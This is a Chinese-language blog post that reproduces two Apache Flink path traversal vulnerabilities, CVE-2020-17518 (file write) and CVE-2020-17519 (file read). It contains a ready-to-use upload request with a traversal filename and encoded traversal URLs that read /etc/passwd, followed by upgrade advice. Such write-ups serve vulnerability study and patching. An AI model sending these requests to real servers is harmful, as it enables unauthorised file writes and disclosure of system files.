Apache Flink (文件写入漏洞/文件读取漏洞​)CVE-2020-17518/17519

494 阅读2分钟

图片

Apache Flink (文件写入漏洞/文件读取漏洞)

CVE-2020-17518/17519


一、漏洞描述

Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。

CVE-2020-17518: 文件写入漏洞

攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。

CVE-2020-17519: 文件读取漏洞

Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的) 。

二、影响版本

Apache Flink 1.5.1 ~ 1.11.2

三、漏洞复现

环境地址:

github.com/vulhub/vulh…

1、CVE-2020-17518: 文件写入漏洞

POST /jars/upload HTTP/1.1
Host: IP:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 189

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/sucess"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

图片

访问:文件写入成功

http://ip+port/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucess

图片


2、CVE-2020-17519: 文件读取漏洞

http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

访问路径获取passwd

图片

四、修复建议

所有用户升级到Flink 1.11.3或1.12.0,下载链接为:

flink.apache.org/downloads.h…

flink.apache.org/downloads.h…

参考:

mp.weixin.qq.com/s/-OFaYj\_C…

mp.weixin.qq.com/s/DTXc-RiJP…

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

图片

个人知乎:www.zhihu.com/people/fu-w…

个人简书:www.jianshu.com/u/bf0e38a8d…

个人CSDN:blog.csdn.net/qq\_3760279…

个人博客园:www.cnblogs.com/thelostworl…

FREEBUF主页:www.freebuf.com/author/thel…

图片